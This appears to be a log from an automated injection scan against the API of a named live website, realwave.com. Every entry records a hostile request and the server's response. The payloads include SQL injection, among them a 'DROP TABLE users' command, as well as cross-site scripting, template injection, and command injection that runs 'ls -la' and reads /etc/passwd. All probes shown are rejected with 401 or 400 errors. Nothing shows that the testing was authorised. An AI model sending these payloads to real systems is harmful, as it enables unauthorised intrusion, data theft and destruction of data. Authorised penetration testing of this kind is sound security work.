124 lines
3.1 KiB
Plaintext
124 lines
3.1 KiB
Plaintext
=== PHASE 3: API ENDPOINT INJECTION ===
|
|
|
|
--- Test: sqli_agentlib (GET) ---
|
|
URL: https://www.realwave.com/api/Academy/AgentLibrary?id=1'OR'1'='1
|
|
HTTP Code: 401
|
|
Response Headers:
|
|
HTTP/2 401
|
|
server: Microsoft-IIS/10.0
|
|
x-powered-by: ASP.NET
|
|
date: Sat, 07 Feb 2026 05:45:28 GMT
|
|
|
|
Response Body (first 500 chars):
|
|
|
|
=========================================
|
|
|
|
--- Test: sqli_lessons (GET) ---
|
|
URL: https://www.realwave.com/api/Academy/Lessons?id=1;DROP+TABLE+users--
|
|
HTTP Code: 401
|
|
Response Headers:
|
|
HTTP/2 401
|
|
server: Microsoft-IIS/10.0
|
|
x-powered-by: ASP.NET
|
|
date: Sat, 07 Feb 2026 05:45:28 GMT
|
|
|
|
Response Body (first 500 chars):
|
|
|
|
=========================================
|
|
|
|
--- Test: sqli_customers (GET) ---
|
|
URL: https://www.realwave.com/api/subscriptions/customers?email=test@test.com'+OR+'1'='1
|
|
HTTP Code: 401
|
|
Response Headers:
|
|
HTTP/2 401
|
|
server: Microsoft-IIS/10.0
|
|
x-powered-by: ASP.NET
|
|
date: Sat, 07 Feb 2026 05:45:29 GMT
|
|
|
|
Response Body (first 500 chars):
|
|
|
|
=========================================
|
|
|
|
--- Test: xss_user_path (GET) ---
|
|
URL: https://www.realwave.com/api/user/<script>alert(1)</script>
|
|
HTTP Code: 400
|
|
Response Headers:
|
|
HTTP/2 400
|
|
content-type: text/html; charset=us-ascii
|
|
server: Microsoft-HTTPAPI/2.0
|
|
date: Sat, 07 Feb 2026 05:45:29 GMT
|
|
content-length: 324
|
|
|
|
Response Body (first 500 chars):
|
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
|
|
<HTML><HEAD><TITLE>Bad Request</TITLE>
|
|
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
|
|
<BODY><h2>Bad Request - Invalid URL</h2>
|
|
<hr><p>HTTP Error 400. The request URL is invalid.</p>
|
|
</BODY></HTML>
|
|
|
|
=========================================
|
|
|
|
--- Test: ssti_lessons_1 (GET) ---
|
|
URL: https://www.realwave.com/api/Academy/Lessons?q=%7B%7B7*7%7D%7D
|
|
HTTP Code: 401
|
|
Response Headers:
|
|
HTTP/2 401
|
|
server: Microsoft-IIS/10.0
|
|
x-powered-by: ASP.NET
|
|
date: Sat, 07 Feb 2026 05:45:30 GMT
|
|
|
|
Response Body (first 500 chars):
|
|
|
|
=========================================
|
|
|
|
--- Test: ssti_lessons_2 (GET) ---
|
|
URL: https://www.realwave.com/api/Academy/Lessons?q=${7*7}
|
|
HTTP Code: 401
|
|
Response Headers:
|
|
HTTP/2 401
|
|
server: Microsoft-IIS/10.0
|
|
x-powered-by: ASP.NET
|
|
date: Sat, 07 Feb 2026 05:45:30 GMT
|
|
|
|
Response Body (first 500 chars):
|
|
|
|
=========================================
|
|
|
|
--- Test: cmdi_file_1 (GET) ---
|
|
URL: https://www.realwave.com/api/Academy/Lessons?file=;ls+-la
|
|
HTTP Code: 401
|
|
Response Headers:
|
|
HTTP/2 401
|
|
server: Microsoft-IIS/10.0
|
|
x-powered-by: ASP.NET
|
|
date: Sat, 07 Feb 2026 05:45:32 GMT
|
|
|
|
Response Body (first 500 chars):
|
|
|
|
=========================================
|
|
|
|
--- Test: cmdi_file_2 (GET) ---
|
|
URL: https://www.realwave.com/api/Academy/Lessons?file=|cat+/etc/passwd
|
|
HTTP Code: 401
|
|
Response Headers:
|
|
HTTP/2 401
|
|
server: Microsoft-IIS/10.0
|
|
x-powered-by: ASP.NET
|
|
date: Sat, 07 Feb 2026 05:45:32 GMT
|
|
|
|
Response Body (first 500 chars):
|
|
|
|
=========================================
|
|
|
|
--- Test: xss_post_agentlib (POST) ---
|
|
HTTP Code: 401
|
|
HTTP/2 401
|
|
server: Microsoft-IIS/10.0
|
|
x-powered-by: ASP.NET
|
|
date: Sat, 07 Feb 2026 05:45:33 GMT
|
|
|
|
Body:
|
|
|
|
=========================================
|